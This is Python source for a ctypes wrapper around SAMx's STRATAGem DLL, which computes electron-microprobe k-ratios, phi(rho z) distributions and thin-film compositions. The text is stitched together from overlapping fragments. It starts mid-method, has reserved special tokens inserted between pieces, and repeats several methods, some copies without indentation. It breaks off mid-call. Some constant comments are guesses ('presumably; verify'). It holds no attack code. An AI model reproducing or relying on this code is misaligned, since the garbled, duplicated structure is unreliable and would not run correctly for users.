i_ = c.c_int(i)
if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
self._raise_error('Cannot get thickness')
thicknesses.append(thick_.value)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
iHv_ = c.c_int(indexes[2])
if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
iHv_, c.byref(k_)):
self._raise_error('Cannot get k-ratio')
kratios.setdefault(experiment, []).append(k_.value)
return thicknesses, kratios
<|reserved_special_token_0|>
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
@_check_key
def _compute_kratios_multilayers(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_thickness`.
"""
for i, layer in enumerate(self._layers.keys()):
if not layer.is_thickness_known():
raise ValueError('Thickness of layer %i is unknown' % i)
layer = list(self._layers.keys())[0]
thickness_low_m = layer.thickness_m
thickness_high_m = layer.thickness_m * 10
step = 1
_thicknesses, kratios = self.compute_kratio_vs_thickness(layer,
thickness_low_m, thickness_high_m, step)
output = {}
for experiment, kratio in kratios.items():
output.setdefault(experiment, kratio[0])
return output
<|reserved_special_token_0|>
@_check_key
def compute(self, iteration_max=50):
"""
Computes the unknown composition(s) and thickness(es) in the specified
sample.
:arg iteration_max: maximum number of iterations of the solve
(default: 50)
:type iteration_max: :class:`int`
:return: calculated sample
:rtype: :class:`.Sample`
"""
zs = set(exp.z for exp in self._experiments.keys())
for layer in (list(self._layers.keys()) + [self._substrate[0]]):
for z, wf in layer.composition.items():
if z in zs:
continue
if wf is None:
continue
logger.debug('Added dummy experiment for z=%i', z)
exp = Experiment(z, LINE_KA, 0.0, analyzed=False)
self.add_experiment(exp)
iteration_max_ = c.c_int(iteration_max)
logger.debug('StSetMaxNbIter(%i)', iteration_max)
self._lib.StSetMaxNbIter(iteration_max_)
logger.debug('StComputeIterpStart(key)')
if not self._lib.StComputeIterpStart(self._key):
self._raise_error('Cannot start iteration')
continue_ = c.c_bool(True)
iteration = 0
logger.debug('Start iteration')
while True:
iteration += 1
logger.debug('Iteration #%i' % iteration)
logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
break
if not continue_.value:
break
logger.debug('Iteration completed')
thick_known = c.c_bool()
mass_thickness = c.c_double()
thickness = c.c_double()
density = c.c_double()
def get_layer(layer, ilayer):
ilayer_ = c.c_int(ilayer)
logger.debug('StSdGetNbElts(key, %i)' % ilayer)
nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
if nbelt == -1:
self._raise_error('Cannot get number of elements')
flag_ = (c.c_int * nbelt)()
wfs_ = (c.c_double * nbelt)()
logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_
):
self._raise_error('Cannot get layer concentration')
composition = {}
for z in layer.composition.keys():
nra_ = c.c_int(z)
logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
composition[z] = wfs_[zindex]
logger.debug('StSdGetThick(key, %i)', ilayer)
if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(
thick_known), c.byref(mass_thickness), c.byref(thickness),
c.byref(density)):
self._raise_error('Cannot get thickness')
return (composition, thickness.value / 10000000000.0,
mass_thickness.value * 10.0, density.value * 1000.0)
sample = Sample(get_layer(*self._substrate)[0])
for layer, ilayer in self._layers.items():
sample.add_layer(*get_layer(layer, ilayer))
return sample
@_check_key
def compute_prz(self, maxdepth_m=None, bins=100):
"""
Compute :math:`\\phi(\\rho z)` of all experiments.
.. warning:: Only available for substrate (no layers).
:arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
distribution in meters. If ``None``, Kanaya-Okayama electron range
is used with a safety factor of 1.5.
:type maxdepth_m: :class:`float`
:arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
:type bins: :class:`int`
:return: a :class:`dict` where the keys are the experiments and the
values are a tuple containing three lists:
* :math:`\\rho z` coordinates (in g/cm2)
* generated intensities of :math:`\\phi(\\rho z)` (no absorption)
* emitted intensites of :math:`\\phi(\\rho z)`
"""
if len(self._layers) > 0:
raise RuntimeError('PRZ can only be computed for substrate')
hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
maxhv_eV = max(hvs_eV)
maxhv_ = c.c_double(maxhv_eV / 1000.0)
logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)
self._lib.StSetScaleHV(maxhv_)
logger.debug('StComputePrz(key)')
if not self._lib.StComputePrz(self._key):
self._raise_error('Cannot compute prz')
przs = {}
for experiment, indexes in self._experiments.items():
if maxdepth_m is None:
maxdepth_m = 0.0
energy_keV = experiment.energy_eV / 1000.0
for z, fraction in self._substrate[0].composition.items():
dr = 0.0276 * atomic_mass_kg_mol(z
) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *
mass_density_kg_m3(z) / 1000.0)
maxdepth_m += fraction / (dr * 1e-06)
maxdepth_m = 1.0 / maxdepth_m
maxdepth_m *= 1.5
increment_kg_m2 = maxdepth_m * self._substrate[0
].density_kg_m3 / bins
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
ihv_ = c.c_int(0)
rzs = []
ys_generated = []
ys_emitted = []
for i in range(bins):
rz_ = c.c_double(i * increment_kg_m2 * 0.1)
rzs.append(i * increment_kg_m2)
y_ = c.c_double()
bUseExp_ = c.c_bool(True)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_emitted.append(y_.value)
y_ = c.c_double()
bUseExp_ = c.c_bool(False)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_generated.append(y_.value)
przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))
return przs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger = logging.getLogger(__name__)
<|reserved_special_token_0|>
try:
    import winreg
except ImportError:
    try:
        import _winreg as winreg
    except ImportError:
        class winreg:
            """
            Minimal stand-in for the Windows :mod:`winreg` module so this
            module can at least be imported on non-Windows platforms.
            Registry lookups always return ``None``.
            """
            HKEY_CURRENT_USER = None

            class _PyHKEY(object):
                def __enter__(self):
                    return self

                def __exit__(self, exc_type, exc_value, traceback):
                    pass

            # BUG FIX: these were instance methods but are called on the
            # class itself (winreg.OpenKey(...)), which raised TypeError.
            # They are now static methods mirroring the real winreg
            # signatures.
            @staticmethod
            def OpenKey(key, sub_key, reserved=0, access=None):
                return winreg._PyHKEY()

            @staticmethod
            def QueryValueEx(key, value_name):
                return None
<|reserved_special_token_0|>
# Registry location where the STRATAGem installation directory is stored.
_REGISTRY_KEY = 'Software\\SAMx\\Stratagem\\Configuration'
_REGISTRY_VALUENAME = 'InstallOEMDirectory'
# :math:`\phi(\rho z)` model selectors (see get_prz_mode).
PRZMODE_XPP = 0
# XPP model of Pouchou & Pichoir -- presumably; verify with the SDK manual
PRZMODE_PAP = 1
# PAP model of Pouchou & Pichoir -- presumably; verify with the SDK manual
PRZMODE_GAU = 2
# Gaussian model -- presumably; verify with the SDK manual
# Fluorescence correction selectors (see get_fluorescence).
FLUORESCENCE_NONE = 0
# no fluorescence correction
FLUORESCENCE_LINE = 1
# correction from characteristic lines
FLUORESCENCE_LINE_CONT = 2
# correction from characteristic lines and continuum
# Internal flags passed to StSdSetConcFlag (see _add_layer).
_CONCENTRATION_FLAG_KNOWN = 0
_CONCENTRATION_FLAG_UNKNOWN = 1
_CONCENTRATION_FLAG_STOICHIOMETRIC = 2
_CONCENTRATION_FLAG_TRACE = 3
_CONCENTRATION_FLAG_DIFFERENCE = 4
class StratagemError(Exception):
    """
    Base exception for all errors reported by the STRATAGem interface.
    """
def _check_key(method):
    """
    Decorator ensuring the DLL object key exists (i.e. that
    :meth:`Stratagem.init` was called) before *method* runs.
    """
    @functools.wraps(method)
    def _guarded(self, *args, **kwargs):
        if self._key is None:
            raise StratagemError('Not initialize. Call init().')
        return method(self, *args, **kwargs)
    return _guarded
class Stratagem:
"""
Main interface establishing a connection to the STRATAGem OEM interface and
perform calculations using SAMx's STRATAGem.
It is highly recommended to use :class:`Stratagem` as a context manager
(i.e. ``with`` statement) to ensure that the connection to the DLL is
properly closed.
For instance::
>>> with Stratagem() as strata:
... strata.prz_mode = PRZMODE_XPP
Otherwise the following series of method must be called::
>>> strata = Stratagem()
>>> strata.init()
>>> strata.prz_mode = PRZMODE_XPP
>>> strata.close()
"""
def __init__(self, dll_path=None, display_error=True):
"""
:arg dll_path: complete path to the location of ``stratadllogger.dll``
(optional). If ``None``, the path is found in the Windows registry
under ``Software\\SAMx\\Stratagem\\Configuration``. If the DLL is not
found a :class:`StratagemError` is raised.
:type dll_path: :class:`str`
:arg display_error: whether to display a message dialog on error
:type display_error: :class:`bool`
"""
if dll_path is None:
with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY
) as key:
basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]
dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')
cwd = os.getcwd()
try:
logger.debug('dll=%s', dll_path)
self._lib = c.WinDLL(dll_path)
finally:
os.chdir(cwd)
logger.debug('StEnableErrorDisplay(%r)', display_error)
self._lib.StEnableErrorDisplay(c.c_bool(display_error))
self._key = None
self._cwd = os.getcwd()
self._layers = {}
self._substrate = None
self._experiments = {}
self._tmpstandards = []
    def __enter__(self):
        # Context-manager entry: initializes the STRATAGem connection.
        self.init()
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        # Context-manager exit: always closes; exceptions are not suppressed.
        self.close()
        return False
    def _stobjectnew(self, key=None, standard=False):
        """
        Creates a new STRATAGem object in the DLL and returns its key.
        :arg key: 8-character ASCII identifier; a random one is generated
            when ``None``
        :arg standard: whether the object describes a standard rather than
            a normal sample
        :return: the key as a ctypes string buffer
        """
        if key is None:
            characters = string.ascii_lowercase
            key = ''.join(random.choice(characters) for _ in range(8))
            key = key.encode('ascii')
        if not isinstance(key, c.c_byte):
            # NOTE(review): c.c_byte looks odd here -- a bytes key is always
            # wrapped in a string buffer; confirm the intended type check.
            key = c.create_string_buffer(key)
        bnormal_ = c.c_bool(not standard)
        iniflags_ = c.c_int(0)
        logger.debug('StObjectNew(key, %r, %i)', not standard, 0)
        if not self._lib.StObjectNew(key, bnormal_, iniflags_):
            self._raise_error('Cannot create object')
        return key
def _raise_error(self, alternate=''):
"""
Raises a :class:`StratagemError`.
The error code and message of known errors are retrieved from STRATAGem.
If this is not possible, *alternate* is used as the error message.
"""
errnum_ = c.c_ulong()
errtype_ = c.c_int()
self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
if errnum_.value != 0:
if errtype_.value == 0:
buf_ = c.create_string_buffer(256)
self._lib.StGetMsg(errnum_, buf_, 256)
raise StratagemError(buf_.value.decode('ascii'))
elif errtype_.value == 1:
raise c.WinError(errtype_.value)
else:
raise StratagemError('Error %i' % errnum_.value)
else:
raise StratagemError(alternate)
def init(self):
"""
Initializes and setups STRATAGem.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
raise RuntimeError('Already initialized. Call close() first.')
self._key = self._stobjectnew()
self._cwd = os.getcwd()
self.reset()
def close(self):
"""
Closes the connection to the STRATAGem DLL.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
logger.debug('StObjectDelete(key)')
self._lib.StObjectDelete(self._key)
self._key = None
for filepath in self._tmpstandards:
os.remove(filepath)
logger.debug('Remove temporary standard: %s', filepath)
self.reset()
def reset(self):
"""
Resets all parameters to the defaults, remove all experiments and sample.
"""
if self._key:
self._lib.StObjectReset(self._key)
os.chdir(self._cwd)
self._layers.clear()
self._substrate = None
self._experiments.clear()
self._tmpstandards.clear()
@_check_key
def set_sample(self, sample):
"""
Sets the sample, which will be used in all subsequent calculations.
Note that only one sample can be defined.
:arg sample: sample definition
:type sample: :class:`Sample`
"""
self.reset()
for layer in sample.layers:
index = self._add_layer(layer, substrate=False)
self._layers.setdefault(layer, index)
index = self._add_layer(sample.substrate, substrate=True)
self._substrate = sample.substrate, index
@_check_key
def get_sample(self):
"""
Returns the current sample.
It can correspond to the sample defined by :meth:`set_sample` or the
sample resulting from the computations (see :meth:`compute`).
.. note:: a new sample is returned every time this method is called
:return: current sample
:rtype: :class:`Sample`
"""
sample = Sample(self._substrate[0].composition)
for layer in self._layers:
sample.add_layer(layer.composition, layer.thickness_m, layer.
mass_thickness_kg_m2, layer.density_kg_m3)
return sample
sample = property(get_sample, set_sample, doc='Property to set/get sample')
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
if key is None:
key = self._key
logger.debug('StSdAddLayer(key)')
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug('StSdAddLayer(key, %i)', ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error('Cannot add layer')
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error('Cannot add element')
z, wf = value
nra_ = c.c_int(z)
logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error('Cannot set atomic number')
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error('Cannot set concentration')
logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)
):
self._raise_error('Cannot set concentration flag')
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1000.0
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 10000000000.0
mass_thickness = layer.mass_thickness_kg_m2 * 0.1
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error('Cannot set thickness')
return int(ilayer_)
    def _create_standard(self, standard):
        """
        Internal method to create a new object defining the standard
        :class:`.Sample` and write it as a ``.tfs`` file in the standard
        directory.

        :arg standard: sample describing the standard
        :return: path to the saved standard file
        """
        # The standard is built in its own STRATAGem object (standard=True)
        key_ = self._stobjectnew(standard=True)
        for layer in standard.layers:
            self._add_layer(layer, substrate=False, key=key_)
        self._add_layer(standard.substrate, substrate=True, key=key_)

        # The file is named after the random object key
        filename = key_.value.decode('ascii') + '.tfs'
        filepath = os.path.join(self.get_standard_directory(), filename)
        filepath_ = c.create_string_buffer(filepath.encode('ascii'))
        logger.debug('StObjectWriteFile(key, %s)', filepath)
        if not self._lib.StObjectWriteFile(key_, filepath_):
            self._raise_error('Cannot save standard')
        self._lib.StObjectDelete(key_)

        # Tracked so close() can delete the temporary file
        self._tmpstandards.append(filepath)
        return filepath
    @_check_key
    def add_experiment(self, experiment):
        """
        Adds an experiment, i.e. measurements of k-ratio at different energies.
        .. hint:: Use :meth:`reset` method to remove defined experiments.

        :arg experiment: experiment
        :type experiment: :class:`Experiment`
        """
        nra_ = c.c_int(experiment.z)
        klm_ = c.c_int(experiment.line)
        hv_ = c.c_double(experiment.energy_eV / 1000.0)  # eV -> keV
        # Out-parameters: indexes assigned by the DLL for element/line/k-ratio
        ielt_ = c.c_int()
        iline_ = c.c_int()
        iexpk_ = c.c_int()
        logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,
            experiment.line)
        if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.
            byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
            self._raise_error('Cannot add atomic number and line')

        # A Sample standard is first materialized as a temporary .tfs file
        standard = experiment.standard
        if isinstance(standard, Sample):
            standard = self._create_standard(standard)
        standard_ = c.create_string_buffer(standard.encode('ascii'))
        logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,
            iline_.value, klm_.value, standard)
        if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_):
            self._raise_error('Cannot set standard')

        analyzed = experiment.is_analyzed()
        analyzed_ = c.c_bool(analyzed)
        logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)
        if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
            self._raise_error('Cannot add experiment analyzed flag')

        kratio_ = c.c_double(experiment.kratio)
        logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',
            ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /
            1000.0, experiment.energy_eV / 1000.0, experiment.kratio)
        if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,
            hv_, kratio_, c.c_double(0.0), c.c_int(2)):
            self._raise_error('Cannot set experiment k-ratio')

        # Only analyzed experiments are kept for later result lookups
        if experiment.is_analyzed():
            indexes = ielt_.value, iline_.value, iexpk_.value
            self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
@_check_key
def set_geometry(self, toa, tilt, azimuth):
"""
Sets the geometry.
:arg toa: take off angle (in radians)
:arg tilt: tilt angle (in radians)
:arg azimuth: azimuthal angle (in radians)
"""
toa_ = c.c_double(toa)
tilt_ = c.c_double(tilt)
azimuth_ = c.c_double(azimuth)
logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)
if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):
self._raise_error('Cannot set geometry parameters')
    @_check_key
    def get_geometry(self):
        """
        Returns the geometry.

        :return: take off angle (in radians), tilt angle (in radians),
            azimuthal angle (in radians)
        """
        # Out-parameters filled by the DLL
        toa_ = c.c_double()
        tilt_ = c.c_double()
        azimuth_ = c.c_double()
        logger.debug('StGetGeomParams(key)')
        if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(
            tilt_), c.byref(azimuth_)):
            self._raise_error('Cannot get geometry parameters')
        return toa_.value, tilt_.value, azimuth_.value

    geometry = property(get_geometry, doc='Property to get geometry')
    @_check_key
    def set_prz_mode(self, mode):
        """
        Sets the type of model to use for the :math:`\\phi(\\rho z)`.

        :arg mode: type of model, either
            * :data:`PRZMODE_XPP`
            * :data:`PRZMODE_PAP`
            * :data:`PRZMODE_GAU`
        :type mode: :class:`int`
        """
        mode_ = c.c_int(mode)
        logger.debug('StSetPrzMode(%i)', mode)
        # NOTE(review): the return value is not checked, unlike most other
        # DLL calls in this class -- confirm the call cannot fail.
        self._lib.StSetPrzMode(mode_)
    @_check_key
    def get_prz_mode(self):
        """
        Returns the type of model to use for the :math:`\\phi(\\rho z)`.

        :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
            :data:`PRZMODE_GAU`
        :rtype: :class:`int`
        """
        return self._lib.StGetPrzMode()

    prz_mode = property(get_prz_mode, set_prz_mode, doc=
        'Property to get/set prz mode')
    @_check_key
    def set_fluorescence(self, flag):
        """
        Sets the fluorescence flag.

        :arg flag: either
            * :data:`FLUORESCENCE_NONE`
            * :data:`FLUORESCENCE_LINE`
            * :data:`FLUORESCENCE_LINE_CONT`
        :type flag: :class:`int`
        """
        flag_ = c.c_int(flag)
        logger.debug('StSetFluorFlg(%i)', flag)
        # NOTE(review): the return value is not checked -- confirm the call
        # cannot fail.
        self._lib.StSetFluorFlg(flag_)
    @_check_key
    def get_fluorescence(self):
        """
        Returns the fluorescence flag.

        :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
            or :data:`FLUORESCENCE_LINE_CONT`
        :rtype: :class:`int`
        """
        return self._lib.StGetFluorFlg()

    fluorescence = property(get_fluorescence, set_fluorescence, doc=
        'Property to get/set fluorescence')
@_check_key
def set_standard_directory(self, dirpath):
"""
Sets the directory where standard files are stored.
:arg dirpath: path to directory
:type dirpath: :class:`str`
"""
dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
self._lib.StSetDirectory(c.c_int(1), dirpath_)
    @_check_key
    def get_standard_directory(self):
        """
        Returns the directory where standard files are stored.

        :rtype: :class:`str`
        """
        # Fixed-size character buffer filled by the DLL
        dirpath = (c.c_char * 256)()
        self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
        return dirpath.value.decode('ascii')

    standard_directory = property(get_standard_directory,
        set_standard_directory, doc='Property to get/set standard directory')
    @_check_key
    def compute_kratio_vs_thickness(self, layer, thickness_low_m,
        thickness_high_m, step):
        """
        Computes the variation of the k-ratio as a function of the thickness
        for a layer.

        :arg layer: layer of a sample (must have been previously added)
        :type layer: :class:`.Layer`
        :arg thickness_low_m: lower limit of the thickness in meters
        :type thickness_low_m: :class:`float`
        :arg thickness_high_m: upper limit of the thickness in meters
        :type thickness_high_m: :class:`float`
        :arg step: number of steps
        :type step: :class:`int`
        :return: :class:`tuple` containing
            * :class:`list` of thicknesses
            * :class:`dict` where the keys are experiments (as defined by
              :meth:`.add_experiment`) and the values are :class:`list`
              containing k-ratios for each thickness
        :raise ValueError: if *layer* is not part of the current sample
        """
        # Unit code 2 selects the thickness unit used by the sweep
        logger.debug('StSetKvsThicknessUnit(2)')
        self._lib.StSetKvsThicknessUnit(2)

        if layer not in self._layers:
            raise ValueError('Unknown layer')
        ilayer = self._layers[layer]
        ilayer_ = c.c_int(ilayer)

        step_ = c.c_int(step)
        logger.debug('StSetNbComputedHV(%i)', step)
        self._lib.StSetNbComputedHV(step_)

        # m -> x1e9 (nanometers)
        low_ = c.c_double(thickness_low_m * 1000000000.0)
        high_ = c.c_double(thickness_high_m * 1000000000.0)
        logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer,
            thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)
        if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_):
            self._raise_error('Cannot compute k-ratio vs thickness')

        thicknesses = []
        kratios = {}
        thick_ = c.c_double()
        k_ = c.c_double()
        # step intervals -> step + 1 sampled points
        for i in range(step + 1):
            i_ = c.c_int(i)
            if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
                self._raise_error('Cannot get thickness')
            thicknesses.append(thick_.value)

            for experiment, indexes in self._experiments.items():
                ielt_ = c.c_int(indexes[0])
                iline_ = c.c_int(indexes[1])
                iHv_ = c.c_int(indexes[2])
                if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
                    iHv_, c.byref(k_)):
                    self._raise_error('Cannot get k-ratio')
                kratios.setdefault(experiment, []).append(k_.value)

        return thicknesses, kratios
    @_check_key
    def compute_kratio_vs_energy(self, energy_high_eV, step):
        """
        Computes the variation of the k-ratio as a function of the incident
        energy.
        Note that the computation also starts at 0 keV up to the specified energy.

        :arg energy_high_eV: upper limit of the thickness in electronvolts
        :type energy_high_eV: :class:`float`
        :arg step: number of steps
        :type step: :class:`int`
        :return: :class:`tuple` containing
            * :class:`list` of energies in electronvolts
            * :class:`dict` where the keys are experiments (as defined by
              :meth:`.add_experiment`) and the values are :class:`list`
              containing k-ratios for each energy
        """
        step_ = c.c_int(step)
        logger.debug('StSetNbComputedHV(%i)', step)
        self._lib.StSetNbComputedHV(step_)

        energy_ = c.c_double(energy_high_eV / 1000.0)  # eV -> keV
        logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))
        self._lib.StSetMaxHV(energy_)

        logger.debug('StComputeKvsHV(key)')
        if not self._lib.StComputeKvsHV(self._key):
            self._raise_error('Cannot compute k-ratio vs energy')

        energies = []
        kratios = {}
        k_ = c.c_double()
        bHV_ = c.c_bool(True)
        # Energies are derived locally: step intervals from 0 to the maximum
        # NOTE(review): hv is in keV here although the docstring says the
        # returned energies are in electronvolts -- confirm the intended unit.
        increment = float(energy_high_eV / 1000.0) / step
        for i in range(step + 1):
            hv = i * increment
            hv_ = c.c_double(hv)

            for experiment, indexes in self._experiments.items():
                ielt_ = c.c_int(indexes[0])
                iline_ = c.c_int(indexes[1])
                if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,
                    bHV_, c.byref(k_)):
                    self._raise_error('Cannot get k-ratio')
                kratios.setdefault(experiment, []).append(k_.value)

            energies.append(hv)

        return energies, kratios
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
    @_check_key
    def _compute_kratios_multilayers(self):
        """
        Internal method to compute the k-ratios using the
        :meth:`compute_kratio_vs_thickness`.

        All layer thicknesses must be known. The sweep's lower bound equals
        the first layer's actual thickness, so the k-ratio at index 0 of the
        sweep is the wanted value.

        :raise ValueError: if any layer has an unknown thickness
        """
        for i, layer in enumerate(self._layers.keys()):
            if not layer.is_thickness_known():
                raise ValueError('Thickness of layer %i is unknown' % i)

        # Sweep over the first layer only
        layer = list(self._layers.keys())[0]
        thickness_low_m = layer.thickness_m
        thickness_high_m = layer.thickness_m * 10
        step = 1
        _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,
            thickness_low_m, thickness_high_m, step)

        output = {}
        for experiment, kratio in kratios.items():
            # Index 0 corresponds to the actual thickness (the lower bound)
            output.setdefault(experiment, kratio[0])

        return output
@_check_key
def _compute_kratios_substrate(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_energy`.
"""
output = {}
step = 2
for experiment in self._experiments:
energy_high_eV = experiment.energy_eV
_energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,
step)
kratio = kratios[experiment][-1]
if kratio < 0:
logger.warn(
'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'
)
_energies, kratios = self.compute_kratio_vs_energy(
energy_high_eV + 1.0, step)
kratio = kratios[experiment][-1]
output.setdefault(experiment, kratio)
return output
    @_check_key
    def compute(self, iteration_max=50):
        """
        Computes the unknown composition(s) and thickness(es) in the specified
        sample.

        :arg iteration_max: maximum number of iterations of the solve
            (default: 50)
        :type iteration_max: :class:`int`
        :return: calculated sample
        :rtype: :class:`.Sample`
        """
        # Add a dummy (non-analyzed) experiment for every element with a
        # known concentration but no measured k-ratio.
        zs = set(exp.z for exp in self._experiments.keys())
        for layer in (list(self._layers.keys()) + [self._substrate[0]]):
            for z, wf in layer.composition.items():
                if z in zs:
                    continue
                if wf is None:
                    continue
                logger.debug('Added dummy experiment for z=%i', z)
                exp = Experiment(z, LINE_KA, 0.0, analyzed=False)
                self.add_experiment(exp)

        iteration_max_ = c.c_int(iteration_max)
        logger.debug('StSetMaxNbIter(%i)', iteration_max)
        self._lib.StSetMaxNbIter(iteration_max_)

        logger.debug('StComputeIterpStart(key)')
        if not self._lib.StComputeIterpStart(self._key):
            self._raise_error('Cannot start iteration')

        # Iterate until the DLL reports completion (continue_ False) or an
        # error (falsy return value).
        continue_ = c.c_bool(True)
        iteration = 0

        logger.debug('Start iteration')
        while True:
            iteration += 1
            logger.debug('Iteration #%i' % iteration)

            logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
            if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
                break

            if not continue_.value:
                break

        logger.debug('Iteration completed')

        # ctypes out-parameters shared by the get_layer closure below
        thick_known = c.c_bool()
        mass_thickness = c.c_double()
        thickness = c.c_double()
        density = c.c_double()

        def get_layer(layer, ilayer):
            # Fetch computed composition and thickness of one layer
            ilayer_ = c.c_int(ilayer)

            logger.debug('StSdGetNbElts(key, %i)' % ilayer)
            nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
            if nbelt == -1:
                self._raise_error('Cannot get number of elements')

            flag_ = (c.c_int * nbelt)()
            wfs_ = (c.c_double * nbelt)()
            logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
            if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_):
                self._raise_error('Cannot get layer concentration')

            # Map each atomic number to its computed weight fraction
            composition = {}
            for z in layer.composition.keys():
                nra_ = c.c_int(z)
                logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
                zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
                composition[z] = wfs_[zindex]

            logger.debug('StSdGetThick(key, %i)', ilayer)
            if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(
                thick_known), c.byref(mass_thickness), c.byref(thickness),
